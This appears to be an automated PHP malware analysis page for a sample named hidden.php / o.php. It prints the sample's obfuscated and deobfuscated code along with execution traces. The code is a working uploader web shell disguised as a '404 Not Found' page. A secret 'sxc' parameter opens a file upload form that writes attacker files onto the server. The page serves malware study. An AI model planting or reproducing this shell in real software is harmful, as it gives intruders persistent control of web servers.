hidden.php, o.php

md5: bf65998ea37e05f8bec9a56134e4eec5

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Encoding
base64_decode (Original)

Files
copy (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)

Title
404 Not Found (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?php 
echo $_SERVER['REQUEST_URI'];
?> was not found on this server.</p> </body></html> <?php 
if (isset($_GET["sxc"])) {
    echo "\"<form method='POST' enctype='multipart/form-data'><input type='file'name='f' /><input type='submit' value='up' /></form>\"";
    @copy($_FILES['f']['tmp_name'], $_FILES['f']['name']);
    echo "<a href=" . $_FILES['f']['name'] . ">" . $_FILES['f']['name'] . "</a>";
}
Execution traces
data/traces/bf65998ea37e05f8bec9a56134e4eec5_trace-1676249715.0782.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:55:40.976037]
1	0	1	0.000144	393464
1	3	0	0.000207	396552	{main}	1		/var/www/html/uploads/o.php	0	0
1	3	1	0.000226	396552
			0.000252	314200
TRACE END   [2023-02-12 22:55:40.976175]

data/traces/bf65998ea37e05f8bec9a56134e4eec5_trace-1676254301.1791.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:12:07.076965]
1	0	1	0.000186	393528
1	3	0	0.000257	396624	{main}	1		/var/www/html/uploads/hidden.php	0	0
1	3	1	0.000281	396624
			0.000335	314240
TRACE END   [2023-02-13 00:12:07.077150]

Generated HTML code
<html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /o.php was not found on this server.</p>  </body></html>
Original PHP code
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?php echo $_SERVER['REQUEST_URI']; ?> was not found on this server.</p> </body></html> <?php if(isset($_GET["sxc"])){ echo(base64_decode("Ijxmb3"."JtIG1ldGhvZD0n"."UE9TVCcgZW5jdHlw"."ZT0nbXVsdGlwYXJ0L2Z"."vcm0tZGF0YSc+PGl"."ucHV0IHR5cGU9J2ZpbGUnbmF"."tZT0nZicgLz48aW5wdXQgdHlwZT0nc3V"."ibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=")); @copy($_FILES['f']['tmp_name'],$_FILES['f']['name']); echo("<a href=".$_FILES['f']['name'].">".$_FILES['f']['name']."</a>"); } ?>

PHP Malware Analysis

hidden.php, o.php

md5: bf65998ea37e05f8bec9a56134e4eec5

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code